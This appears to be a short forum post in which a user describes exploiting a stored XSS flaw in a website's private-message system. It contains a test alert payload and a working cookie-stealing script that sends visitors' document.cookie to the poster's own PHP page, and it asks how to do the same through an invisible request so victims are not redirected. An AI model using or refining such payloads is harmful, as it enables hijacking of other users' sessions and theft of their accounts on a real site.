Tomm |
Regular user |
|
|
Joined: Oct 06, 2009 |
Posts: 7 |
|
|
|
|
|
|
|
Hi all
A site has a XSS vulnerable in the pm system.So if the message is <script>alert("Hi admin :--)")</script> there will popup a javascript box with the text.Now I made a cookie stealer and it works when the message is <script>
document.location="http://www.mysite/cookiestealer.php?cookie=" + document.cookie;
</script>
but my problem is that this example redirect the viewer to my php script.So my question is there a way to execute some sort of "invisible get"to my page.
tomm |
|